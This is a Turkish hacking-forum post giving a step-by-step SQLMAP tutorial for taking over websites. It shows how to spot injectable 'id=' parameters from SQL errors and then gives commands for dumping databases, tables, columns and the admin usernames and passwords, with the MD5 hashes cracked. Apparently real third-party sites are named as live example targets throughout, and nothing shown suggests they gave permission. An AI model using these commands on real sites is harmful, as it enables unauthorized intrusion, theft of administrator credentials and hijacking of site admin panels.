I
iwystic
Veteran
- Joined
- Aug 27, 2019
- Messages
- 4,834
- Reaction score
- 9,971
+ Python 2.7 indirip kuruyoruz.
+ SQLMAP adlı dosyayı direkt Yerel Disk C'ye atıyoruz.
+ Intelli Tamper 2.7 adlı program, site dosyalarını verir. Bunu admin paneli bulmak için kullanırız.
+ Safe3 adlı program:, sitede çok sağlam SQL Injection taraması yapar
Download // VirusTotal
NOT: Sorun yaşayanlar SQLMAP ve Python'u orjinal sitelerinden indirebilirler.
http://sqlmap.org/
https://www.python.org/download/releases/2.7/
Adım 1: SQLMAP'ı CMD ile Çalıştırma
Yukarıdakileri yaptıktan sonra Başlat'tan CMD'Yİ açalım ve konsol "C:" dizinine gelene kadar şu kodu yazalım:
Code:
cd..
Konsol C:\ dizinine geldikten sonra şu kodu yazalım:
Code:
cd sqlmap
SQLMAP'i çalıştırdık.
Adım 2: SQL Açıklı Site Bulmak
+ Sitelerin bazı sayfalarında, blogların paylaşımlarında bir ID değeri olur. Örneğin: "page.php?id=18" gibi.
+ Örnek Site: Welcome to the DockGuard website
+ Yukarıda verdiğim siteye girip sondaki ID değerinin sonuna " ' " yani tek tırnak işareti koyduğunuzda aşağıdaki gibi;
Code:
http://www.dockguard.co.uk/page.php?id=18'
Şu hatayı alacaksınız;
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''18''' at line 1
Bu ve benzeri hata metinleri sitede SQL açığı olduğuna dair en basit belirtilerdir.
Adım 3: SQL Açıklı Siteyi Ele Geçirmek (Veritabanını Çekmek)
Adım 3.1 - Sitenin Veritabanı İsimlerini Çekme (Database)
SQLMAP'te sitenin veritabanı isimlerini çekmek için şu kodu kullanırız;
Code:
sqlmap.py -u http://hedefsite.com...aciklibolum?id=--dbs
Yani, biz açıklı olarak bulduğumuz herhangi bir siteyi çekmek için şu şekilde yazacağız;
Code:
sqlmap.py -u http://www.seaofstories.com/title.php?id=5193--dbs
Şimdi işleme geçelim; CMD'ye kodumuzu yazalım ve ENTER tuşuna basalım.
ENTER tuşuna bastığımızda, işleme geçiyor. SQLMAP'imiz ve aşağıdaki resimde kırmızı ile bir kısım işaretledim. Sonuna dikkat ederseniz, [Y/N] yazıyor; yani "Evet mi hayır mı?" diye soruyor.
Öyle kısımlarda "y" yazıp, ENTER tuşuna basıyoruz.
Adım 3.2 - Veritabanı Tablolarını Çekmek
SQLMAP'te sitenin tablolarını çekmek için şu kodu kullanırız;
Code:
sqlmap.py -u http://hedefurl.comVeritabanı_Adı --tables
Biz yukarıda bulduğumuz sitenin tablolarını çekmek için şu şekilde yazacağız;
Code:
sqlmap.py -u http://www.seaofstories.com/title.php?id=5193seaofstories_app --tables
NOT: "information_schema" adlı veritabanı ile işimiz yok. Bizim işimiz, "seaofstories_app" adlı veritabanıyladır. Yukarıdaki kodu yazıp enter'a bastığımızda bize tablo isimlerini verecektir.
İşlem bittiğinde, bize tablo isimlerini verecektir. Biz orda işimize yarayanı tespit edeceğiz; Yani, örnek olarak, "Administrator" tablosunu buldu diyelim, Administrator tablosunun kolonlarını çekeceğiz.
Adım 3.3 - Veritabanı Tablolalarının Kolonlarını Çekmek
SQLMAP'te tablo kolonlarını çekmek için şu kodu kullanırız;
Code:
sqlmap.py -u http://hedefurl.com-D Veritabanı_Adı -T Tablo_Adı --columns
Yani, yukarıdaki sitemizin Administrator tablosunun kolonlarını çekmek için kodları şu şekilde yazacağız;
Code:
sqlmap.py -u http://www.seaofstories.com/title.php?id=5193-D seaofstories_app -T Administrators --columns
Bu şekilde kodumuzu yazıp ENTER tuşuna bastığımızda bize o tablonun kolonlarını işlem sırasında çekecektir.
Gördüğünüz gibi kolonları çekti. Şimdi sıra geldi son işleme.
Bize panele girmek için "Username" ve "Password" kolonlarındaki ID ve şifreler gereklidir. Bunun için, 3.4. adıma gidiyoruz.
Adım 3.4 - Kolonlardaki Verileri (Username & Password) Çekme
SQLMAP'te kolonlardaki verileri çekmek için şu kodu kullanırız;
Code:
sqlmap.py -u http://hedefurl.com-D Veritabanı_Adı -T Tablo_Adı -C Kolon_Adı --dump
Yani, yukarıdaki sitemizin password kolonlarındaki verilerini çekmek kodları için şu şekilde yazacağız;
Code:
sqlmap.py -u http://www.seaofstories.com/title.php?id=5193-D seaofstories_app -T Administrators -C password --dump
Bu şekilde kodumuzu yazıp ENTER tuşuna bastığımızda, bize admin şifrelerini çekecektir.
Yukarıda gördüğünüz gibi MD5 şifreyi tespit etti ve üstte kırmızı ile işaretlediğim yerlerde bize sorular sordu, "y" yazıp enter tuşuna bastık. Diğerinde de wordlist kullanılsın mı diye sordu ve MD5'i kırmak için orada direkt "ENTER" tuşuna bastık. Her şeyi detaylı şekilde işaretledim ve altta kırmızı ile işaretlediğim yerde şifrenin kırılmış halini bize verdi.
NOT: Aynı şekilde "username" adlı kolonu çekip admin giriş ID'lerine ulaşırsınız ve aynı şekilde olduğu için onu detaylı olarak göstermedim. Onun kodunu yazarken de bu şekilde yazacaksınız;
Code:
sqlmap.py -u http://www.seaofstories.com/title.php?id=5193-D seaofstories_app -T Administrators -C username --dump
Yardımcı Olabilecek Yazılımlar:
Veteran Dork Studio 3 FINAL - Dork Yardımcı Programı
Veteran SQLMAP Helper - SQLMAP Kod Yardımcı Programı
İyi Forumlar.